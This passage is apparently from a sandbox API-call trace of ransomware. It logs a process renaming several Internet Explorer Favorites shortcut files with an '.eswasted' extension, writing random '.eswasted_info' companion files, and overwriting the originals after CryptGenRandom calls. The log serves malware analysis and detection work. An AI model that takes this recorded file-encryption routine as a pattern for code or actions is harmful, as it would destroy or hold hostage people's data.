lpString1=0x6f5d4c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.eswasted")) returned 1 [0077.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0077.714] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0077.715] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0077.716] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.716] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.716] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0077.717] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0077.717] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.726] SetEndOfFile (hFile=0x124) returned 1 [0077.728] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.728] CloseHandle (hObject=0x124) returned 1 [0077.729] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0077.729] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0077.730] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0077.730] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0077.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x6f5cc0 [0077.730] lstrcpyW (in: lpString1=0x6f5d5c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.730] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0077.731] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.731] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.732] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.733] SetEndOfFile (hFile=0x124) returned 1 [0077.733] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.733] lstrcpyW (in: lpString1=0x6f5d5c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.eswasted")) returned 1 [0077.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.759] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0077.759] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0077.760] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.760] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.760] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0077.761] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0077.761] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.769] SetEndOfFile (hFile=0x124) returned 1 [0077.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.772] CloseHandle (hObject=0x124) returned 1 [0077.773] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0077.773] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0077.774] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0077.774] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.774] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0077.774] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x298) returned 0x6f5cc0 [0077.774] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.774] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.774] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0077.775] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.775] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.776] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.776] SetEndOfFile (hFile=0x124) returned 1 [0077.777] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.777] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.eswasted")) returned 1 [0077.781] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0077.781] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0077.781] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0077.782] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.782] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.782] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0077.783] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0077.783] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.793] SetEndOfFile (hFile=0x124) returned 1 [0077.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.796] CloseHandle (hObject=0x124) returned 1 [0077.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0077.797] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0077.798] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0077.798] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.798] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0077.798] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x6f5cc0 [0077.798] lstrcpyW (in: lpString1=0x6f5d40, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.798] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.798] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0077.799] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.799] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.799] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.800] SetEndOfFile (hFile=0x124) returned 1 [0077.800] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.801] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.801] lstrcpyW (in: lpString1=0x6f5d40, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.eswasted")) returned 1 [0077.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.818] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0077.818] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0077.819] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.819] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.819] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0077.820] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0077.820] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.829] SetEndOfFile (hFile=0x124) returned 1 [0077.831] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.831] CloseHandle (hObject=0x124) returned 1 [0077.833] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0077.833] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0077.834] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0077.834] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0077.834] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x298) returned 0x6f5cc0 [0077.834] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.834] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.834] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0077.835] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.835] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.835] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.836] SetEndOfFile (hFile=0x124) returned 1 [0077.836] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.837] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.837] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.eswasted")) returned 1 [0077.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0077.851] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0077.851] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0077.852] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.852] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.852] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0077.853] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0077.853] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.862] SetEndOfFile (hFile=0x124) returned 1 [0078.308] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.308] CloseHandle (hObject=0x124) returned 1 [0078.309] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.309] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0078.310] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.310] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.310] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0078.310] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x6f5cc0 [0078.310] lstrcpyW (in: lpString1=0x6f5d5c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.310] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.310] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0078.311] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.311] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.321] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.322] SetEndOfFile (hFile=0x124) returned 1 [0078.322] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.322] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.322] lstrcpyW (in: lpString1=0x6f5d5c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.eswasted")) returned 1 [0078.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0078.323] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0078.324] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0078.325] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.325] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.325] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0078.326] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.326] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.335] SetEndOfFile (hFile=0x124) returned 1 [0078.338] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.338] CloseHandle (hObject=0x124) returned 1 [0078.339] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.339] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0078.340] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.340] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0078.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2aa) returned 0x6f65b8 [0078.340] lstrcpyW (in: lpString1=0x6f6658, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.340] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0078.341] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.341] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.341] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.342] SetEndOfFile (hFile=0x124) returned 1 [0078.342] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, 